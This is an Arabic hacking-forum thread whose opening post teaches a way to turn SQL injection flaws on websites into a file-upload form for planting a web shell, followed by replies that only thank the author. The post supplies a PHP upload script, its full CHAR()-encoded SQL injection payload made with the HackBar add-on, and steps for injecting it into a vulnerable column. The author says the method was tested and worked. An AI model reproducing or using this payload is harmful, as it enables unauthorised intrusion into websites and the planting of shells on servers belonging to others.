• أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
  • بادئ الموضوع r3xb0t3r
  • تاريخ البدء
الحالة
مغلق و غير مفتوح للمزيد من الردود.
غير متصل

إنضم
2 ديسمبر 2011
المشاركات
4
الإعجابات
1
النقاط
15
الإجابات المقدمة: 0
#1
السلام عليكم ورحمة الله وبركاته ...

طبعا بدون مقدمات وكاتب الموضوع على عجلة ...

قبل فترة اكثر من شهر خطرت ببالي فكرة ...

هي شلون نعمل مركز رفع من الخلال المواقع المصابة بـ SQL

الطريقة كالتالي ...

ناخذ سكربت مركز الرفع وهذا الكود بتاعه ...

PHP:
 <?php 
echo '<b>Upload Center</b>';
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ){ if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Done !!!</b><br><br>'; }
 else { echo '<b>!!!!!!!Upload Failed!!!!!! </b><br><br>'; }}?>
ونروح على ادادة Hack Bar الموجودة بالفايرفوكس ونختار

SQL > MySQL > MySQLCHAR

راح يظهر مستطيل صغير تخليه بيه اكواد مركز الرفع الي فوق وتضغك ok راح تحصل هذه التشفيرة

PHP:
CHAR(67, 72, 65, 82, 40, 54, 48, 44, 32, 54, 51, 44, 32, 49, 49, 50, 44, 32, 49, 48, 52, 44, 32, 49, 49, 50, 44, 32, 51, 50, 44, 32, 51, 50, 44, 32, 49, 48, 49, 44, 32, 57, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 51, 50, 44, 32, 51, 57, 44, 32, 54, 48, 44, 32, 57, 56, 44, 32, 54, 50, 44, 32, 56, 53, 44, 32, 49, 49, 50, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 51, 50, 44, 32, 54, 55, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 44, 32, 54, 48, 44, 32, 52, 55, 44, 32, 57, 56, 44, 32, 54, 50, 44, 32, 51, 57, 44, 32, 53, 57, 44, 32, 51, 50, 44, 32, 49, 48, 49, 44, 32, 57, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 51, 50, 44, 32, 51, 57, 44, 32, 54, 48, 44, 32, 57, 56, 44, 32, 54, 50, 44, 32, 54, 48, 44, 32, 57, 56, 44, 32, 49, 49, 52, 44, 32, 54, 50, 44, 32, 54, 48, 44, 32, 57, 56, 44, 32, 49, 49, 52, 44, 32, 54, 50, 44, 32, 51, 57, 44, 32, 52, 54, 44, 32, 49, 49, 50, 44, 32, 49, 48, 52, 44, 32, 49, 49, 50, 44, 32, 57, 53, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 48, 44, 32, 52, 49, 44, 32, 52, 54, 44, 32, 51, 57, 44, 32, 54, 48, 44, 32, 57, 56, 44, 32, 49, 49, 52, 44, 32, 54, 50, 44, 32, 54, 48, 44, 32, 52, 55, 44, 32, 57, 56, 44, 32, 54, 50, 44, 32, 51, 57, 44, 32, 53, 57, 44, 32, 51, 50, 44, 32, 49, 48, 49, 44, 32, 57, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 51, 50, 44, 32, 51, 57, 44, 32, 54, 48, 44, 32, 49, 48, 50, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 57, 44, 32, 51, 50, 44, 32, 57, 55, 44, 32, 57, 57, 44, 32, 49, 49, 54, 44, 32, 49, 48, 53, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 54, 49, 44, 32, 51, 52, 44, 32, 51, 52, 44, 32, 51, 50, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 48, 44, 32, 54, 49, 44, 32, 51, 52, 44, 32, 49, 49, 50, 44, 32, 49, 49, 49, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 51, 52, 44, 32, 51, 50, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 57, 57, 44, 32, 49, 49, 54, 44, 32, 49, 50, 49, 44, 32, 49, 49, 50, 44, 32, 49, 48, 49, 44, 32, 54, 49, 44, 32, 51, 52, 44, 32, 49, 48, 57, 44, 32, 49, 49, 55, 44, 32, 49, 48, 56, 44, 32, 49, 49, 54, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 50, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 57, 44, 32, 52, 53, 44, 32, 49, 48, 48, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 51, 52, 44, 32, 51, 50, 44, 32, 49, 49, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 54, 49, 44, 32, 51, 52, 44, 32, 49, 49, 55, 44, 32, 49, 49, 50, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 44, 32, 51, 52, 44, 32, 51, 50, 44, 32, 49, 48, 53, 44, 32, 49, 48, 48, 44, 32, 54, 49, 44, 32, 51, 52, 44, 32, 49, 49, 55, 44, 32, 49, 49, 50, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 44, 32, 51, 52, 44, 32, 54, 50, 44, 32, 51, 57, 44, 32, 53, 57, 44, 32, 51, 50, 44, 32, 49, 48, 49, 44, 32, 57, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 51, 50, 44, 32, 51, 57, 44, 32, 54, 48, 44, 32, 49, 48, 53, 44, 32, 49, 49, 48, 44, 32, 49, 49, 50, 44, 32, 49, 49, 55, 44, 32, 49, 49, 54, 44, 32, 51, 50, 44, 32, 49, 49, 54, 44, 32, 49, 50, 49, 44, 32, 49, 49, 50, 44, 32, 49, 48, 49, 44, 32, 54, 49, 44, 32, 51, 52, 44, 32, 49, 48, 50, 44, 32, 49, 48, 53, 44, 32, 49, 48, 56, 44, 32, 49, 48, 49, 44, 32, 51, 52, 44, 32, 51, 50, 44, 32, 49, 49, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 54, 49, 44, 32, 51, 52, 44, 32, 49, 48, 50, 44, 32, 49, 48, 53, 44, 32, 49, 48, 56, 44, 32, 49, 48, 49, 44, 32, 51, 52, 44, 32, 51, 50, 44, 32, 49, 49, 53, 44, 32, 49, 48, 53, 44, 32, 49, 50, 50, 44, 32, 49, 48, 49, 44, 32, 54, 49, 44, 32, 51, 52, 44, 32, 53, 51, 44, 32, 52, 56, 44, 32, 51, 52, 44, 32, 54, 50, 44, 32, 54, 48, 44, 32, 49, 48, 53, 44, 32, 49, 49, 48, 44, 32, 49, 49, 50, 44, 32, 49, 49, 55, 44, 32, 49, 49, 54, 44, 32, 51, 50, 44, 32, 49, 49, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 54, 49, 44, 32, 51, 52, 44, 32, 57, 53, 44, 32, 49, 49, 55, 44, 32, 49, 49, 50, 44, 32, 49, 48, 56, 44, 32, 51, 52, 44, 32, 51, 50, 44, 32, 49, 49, 54, 44, 32, 49, 50, 49, 44, 32, 49, 49, 50, 44, 32, 49, 48, 49, 44, 32, 54, 49, 44, 32, 51, 52, 44, 32, 49, 49, 53, 44, 32, 49, 49, 55, 44, 32, 57, 56, 44, 32, 49, 48, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 54, 44, 32, 51, 52, 44, 32, 51, 50, 44, 32, 49, 48, 53, 44, 32, 49, 48, 48, 44, 32, 54, 49, 44, 32, 51, 52, 44, 32, 57, 53, 44, 32, 49, 49, 55, 44, 32, 49, 49, 50, 44, 32, 49, 48, 56, 44, 32, 51, 52, 44, 32, 51, 50, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 48, 56, 44, 32, 49, 49, 55, 44, 32, 49, 48, 49, 44, 32, 54, 49, 44, 32, 51, 52, 44, 32, 56, 53, 44, 32, 49, 49, 50, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 51, 52, 44, 32, 54, 50, 44, 32, 54, 48, 44, 32, 52, 55, 44, 32, 49, 48, 50, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 57, 44, 32, 54, 50, 44, 32, 51, 57, 44, 32, 53, 57, 44, 32, 51, 50, 44, 32, 49, 48, 53, 44, 32, 49, 48, 50, 44, 32, 52, 48, 44, 32, 51, 50, 44, 32, 51, 54, 44, 32, 57, 53, 44, 32, 56, 48, 44, 32, 55, 57, 44, 32, 56, 51, 44, 32, 56, 52, 44, 32, 57, 49, 44, 32, 51, 57, 44, 32, 57, 53, 44, 32, 49, 49, 55, 44, 32, 49, 49, 50, 44, 32, 49, 48, 56, 44, 32, 51, 57, 44, 32, 57, 51, 44, 32, 51, 50, 44, 32, 54, 49, 44, 32, 54, 49, 44, 32, 51, 50, 44, 32, 51, 52, 44, 32, 56, 53, 44, 32, 49, 49, 50, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 51, 52, 44, 32, 51, 50, 44, 32, 52, 49, 44, 32, 49, 50, 51, 44, 32, 51, 50, 44, 32, 49, 48, 53, 44, 32, 49, 48, 50, 44, 32, 52, 48, 44, 32, 54, 52, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 50, 44, 32, 49, 50, 49, 44, 32, 52, 48, 44, 32, 51, 54, 44, 32, 57, 53, 44, 32, 55, 48, 44, 32, 55, 51, 44, 32, 55, 54, 44, 32, 54, 57, 44, 32, 56, 51, 44, 32, 57, 49, 44, 32, 51, 57, 44, 32, 49, 48, 50, 44, 32, 49, 48, 53, 44, 32, 49, 48, 56, 44, 32, 49, 48, 49, 44, 32, 51, 57, 44, 32, 57, 51, 44, 32, 57, 49, 44, 32, 51, 57, 44, 32, 49, 49, 54, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 57, 53, 44, 32, 49, 49, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 51, 57, 44, 32, 57, 51, 44, 32, 52, 52, 44, 32, 51, 50, 44, 32, 51, 54, 44, 32, 57, 53, 44, 32, 55, 48, 44, 32, 55, 51, 44, 32, 55, 54, 44, 32, 54, 57, 44, 32, 56, 51, 44, 32, 57, 49, 44, 32, 51, 57, 44, 32, 49, 48, 50, 44, 32, 49, 48, 53, 44, 32, 49, 48, 56, 44, 32, 49, 48, 49, 44, 32, 51, 57, 44, 32, 57, 51, 44, 32, 57, 49, 44, 32, 51, 57, 44, 32, 49, 49, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 51, 57, 44, 32, 57, 51, 44, 32, 52, 49, 44, 32, 52, 49, 44, 32, 51, 50, 44, 32, 49, 50, 51, 44, 32, 51, 50, 44, 32, 49, 48, 49, 44, 32, 57, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 51, 50, 44, 32, 51, 57, 44, 32, 54, 48, 44, 32, 57, 56, 44, 32, 54, 50, 44, 32, 54, 56, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 51, 50, 44, 32, 51, 51, 44, 32, 51, 51, 44, 32, 51, 51, 44, 32, 54, 48, 44, 32, 52, 55, 44, 32, 57, 56, 44, 32, 54, 50, 44, 32, 54, 48, 44, 32, 57, 56, 44, 32, 49, 49, 52, 44, 32, 54, 50, 44, 32, 54, 48, 44, 32, 57, 56, 44, 32, 49, 49, 52, 44, 32, 54, 50, 44, 32, 51, 57, 44, 32, 53, 57, 44, 32, 51, 50, 44, 32, 49, 50, 53, 44, 32, 51, 50, 44, 32, 51, 50, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 49, 53, 44, 32, 49, 48, 49, 44, 32, 51, 50, 44, 32, 49, 50, 51, 44, 32, 51, 50, 44, 32, 49, 48, 49, 44, 32, 57, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 51, 50, 44, 32, 51, 57, 44, 32, 54, 48, 44, 32, 57, 56, 44, 32, 54, 50, 44, 32, 51, 51, 44, 32, 51, 51, 44, 32, 51, 51, 44, 32, 51, 51, 44, 32, 51, 51, 44, 32, 51, 51, 44, 32, 51, 51, 44, 32, 56, 53, 44, 32, 49, 49, 50, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 51, 50, 44, 32, 55, 48, 44, 32, 57, 55, 44, 32, 49, 48, 53, 44, 32, 49, 48, 56, 44, 32, 49, 48, 49, 44, 32, 49, 48, 48, 44, 32, 51, 51, 44, 32, 51, 51, 44, 32, 51, 51, 44, 32, 51, 51, 44, 32, 51, 51, 44, 32, 51, 51, 44, 32, 51, 50, 44, 32, 54, 48, 44, 32, 52, 55, 44, 32, 57, 56, 44, 32, 54, 50, 44, 32, 54, 48, 44, 32, 57, 56, 44, 32, 49, 49, 52, 44, 32, 54, 50, 44, 32, 54, 48, 44, 32, 57, 56, 44, 32, 49, 49, 52, 44, 32, 54, 50, 44, 32, 51, 57, 44, 32, 53, 57, 44, 32, 51, 50, 44, 32, 49, 50, 53, 44, 32, 49, 50, 53, 44, 32, 54, 51, 44, 32, 54, 50, 41)
بعدها تاخذها على طول للعمود المصاب وتخليه مكانه وتضغط انتر وان شاء الله تشوف مركز الرفع امامك

ومن خلال المركز تكدر ترفع ملفاتك حتى الشل وتم التجربة وحمد لله انرفع لكن المشكلة بتحديد مساره

طيب يجي واحد يسأل كيف عرفت انرفع ..؟ لو ما انرفع كان السكربت طبع لك upload faild ....

واعتقد حل مشكلة المسار هي تنصيب سكربت مصاب على السيرفر الشخصي وتطبيق الفكرة ونشوف الشل وين ..

همسة : نزلت هذا الشرح بسبب بعض الناس الي علمتهم هذه الطريقة على الخاص وقامو بنشروها وطلعو هم المكتشفين واصحاب الخبرة


اضافة للموضوع ... صورة للتطبيق على الموضوع



موفقين ^:"
 


غير متصل

إنضم
5 سبتمبر 2011
المشاركات
24
الإعجابات
0
النقاط
5
الإجابات المقدمة: 0
#2
رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

كل الشكر والتحيه والتقدير
مجهود اكثر من رائع
سلمت يداك
)5:")5:"
 


غير متصل

إنضم
7 ديسمبر 2011
المشاركات
16
الإعجابات
0
النقاط
5
العمر
28
الإقامة
FrOm Qatar
الإجابات المقدمة: 0
#3
رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

رائع حبيبى مشكور على هدا المجهود%:"​
 


غير متصل

إنضم
4 ديسمبر 2011
المشاركات
17
الإعجابات
0
النقاط
5
العمر
31
الإقامة
فـي سـسـتم!
الإجابات المقدمة: 0
#4
رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

الله يعطيك العافيه
شرح رائع وسهل
الله يوفقك
)5:"
 


غير متصل

إنضم
9 ديسمبر 2011
المشاركات
61
الإعجابات
3
النقاط
30
العمر
32
الإقامة
EgYpT
الإجابات المقدمة: 0
#5
رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

شكرٍآَ آخـِىَُِ .. وآصَل موٍضوٍعَ متعوٍبَ فيـِهَ

^:"^:"^:"
 


غير متصل

DJ_HacKeR

<b><font color="silver" size="4" face="Arial">ṤạĻỖ

إنضم
9 ديسمبر 2011
المشاركات
39
الإعجابات
0
النقاط
30
العمر
29
الإقامة
::.مكه المكرمه.::
الإجابات المقدمة: 0
#6
رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

وعليككُمَ آلسَلآمَ ورحمة آلله وبركآتهَ ،

يعيطككَ آلعآفيهَ يَ آلغآليَ ،


وآصلَ آبدآعكَ ،

 


غير متصل

DeveloPer Plus
إنضم
9 ديسمبر 2011
المشاركات
69
الإعجابات
0
النقاط
30
الإقامة
Ӄ Ŵ Ť
الإجابات المقدمة: 0
#7
رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

مجهود رآئع يآبعدي !:"
لاهنت ولك احلى ++
 


غير متصل

ExpErt DeveloPer
إنضم
17 سبتمبر 2011
المشاركات
155
الإعجابات
0
النقاط
50
العمر
29
الإقامة
~ IQ-T34M ~
الإجابات المقدمة: 1
#8
رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

يعطيك الف عافية اخي

وبارك الله فيك

مبادرة طيبة تشكر عليها وجزاك الله عنها خير الجزاء&:"
 


غير متصل

OuT-L4w

<b><font size="4"><font color="#FF0000">Ṩ</font><f

إنضم
10 ديسمبر 2011
المشاركات
58
الإعجابات
1
النقاط
30
العمر
25
الإقامة
KeyBoard
الإجابات المقدمة: 0
#9
رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

الله يعافيك اخي .^:"
 


غير متصل

ExpErt DeveloPer
إنضم
11 ديسمبر 2011
المشاركات
48
الإعجابات
0
النقاط
30
الإقامة
kSa
الإجابات المقدمة: 0
#10
رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


سلام عليكم ورحمة الله وبركاته يا غالي
والله موضوع رائع
يعطيك العافية أخي الكريم^:"
 


الحالة
مغلق و غير مفتوح للمزيد من الردود.
الوسوم - Tag الوسوم - Tag
استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل